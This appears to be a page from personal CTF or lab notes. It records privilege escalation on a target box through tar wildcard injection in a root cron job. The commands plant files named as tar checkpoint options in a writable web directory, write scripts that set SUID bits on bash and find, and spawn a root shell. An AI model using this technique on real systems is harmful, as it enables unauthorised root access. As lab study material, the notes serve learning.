Priv Escalation

Crin job running as root see if we can modify it otherwise try mysql running on internal

Tar Wildcard Injection

The script changes to /var/www/html, this is a directory we have write access to.

alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > "--checkpoint-action=exec=sh demo.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod u+s /usr/bin/find" > test.sh
echo "chmod u+s /usr/bin/find" > test.sh
alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > "--checkpoint-action=exec=sh test.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exploit.sh
echo "chmod +s /bin/bash" > exploit.sh
alice@readys:/var/www/html$ touch ./"--checkpoint=1"
touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh"
< touch ./"--checkpoint-action=exec=bash exploit.sh"

This is the ways I did it .

bash-5.0$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
bash-5.0$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# ls -l /usr/bin/find
-rwsr-xr-x 1 root root 315904 Feb 16  2019 /usr/bin/find
bash-5.0#

PreviousExploitation NextNotes

Last updated 3 years ago